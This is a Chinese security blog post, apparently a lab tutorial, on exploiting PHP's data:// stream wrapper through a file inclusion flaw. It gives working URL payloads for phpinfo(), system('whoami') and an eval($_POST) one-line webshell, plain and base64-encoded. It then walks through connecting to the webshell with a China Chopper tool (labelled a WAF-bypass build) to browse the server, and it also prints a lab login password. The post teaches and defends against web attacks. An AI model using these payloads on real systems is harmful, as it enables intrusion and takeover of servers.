文章总结： 本文介绍PHP封装伪协议中data流的利用方法，通过文件包含漏洞实现代码执行、系统命令执行及Getshell。实验演示了直接使用明文payload、base64编码payload执行phpinfo和whoami命令，以及植入一句话木马后使用中国菜刀连接获取服务器权限的完整流程。 综合评分： 72 文章分类： WEB安全,渗透测试,漏洞分析,安全工具

网安每日干货分享之《PHP封装伪协议之data流》-0207

原创

建哥聊安全 建哥聊安全

建哥聊安全

2026年2月7日 15:04 湖南

PHP封装伪协议之data流

实验目的

通过本实验，利用PHP封装伪协议中的data流进行命令执行。

实验环境

·操作机：Win10 用户名：Administrator 密码：Sangfor!7890

·靶机：Apache + PHP

靶场搭建步骤参考https://zhuanlan.zhihu.com/p/433231748）

·实验地址：http://ip/include/include.php

实验原理

PHP有很多内置URL风格的封装协议,这类协议与fopen()，copy()，file_exists()，filesize()等文件系统函数所提供的功能类似。 这类协议有：

利用PHP封装伪协议中data数据流，通过文件包含漏洞进行命令执行。

实验步骤

1、登录操作机，打开浏览器，在浏览器中访问http://ip/include/include.php

2、访问http://ip/include/include.php?page=data://text/plain,<?php phpinfo();?>，代码执行

3、也可以：

将代码进行base64编码，访问http://ip/include/include.php?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

4、访问http://ip/include/include.php?page=data://text/plain,<?php system(‘whoami’);?>，系统命令执行

5、访问http://ip/include/include.php?page=data://text/plain,<?php @eval($_POST[666]);?>，执行一句话木马

6、打开桌面tools文件夹的“中国菜刀（过狗）”，双击exe文件

7、在空白处鼠标右击，点击“添加”，添加shell地址

·地址为：一句话木马地址和连接密码

·脚本类型：PHP

8、点击“添加”，双击一句话木马地址，可以看到已经打开目标机器的文件目录

实验总结

通过本实验，利用PHP封装伪协议中的data流，进行代码执行和系统命令执行，也可以对代码进行base64编码，同样可以执行一句话木马，从而Getshell。 对伪协议的用法总结如下：

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：建哥聊安全 建哥聊安全 建哥聊安全《网安每日干货分享之《PHP封装伪协议之data流》-0207》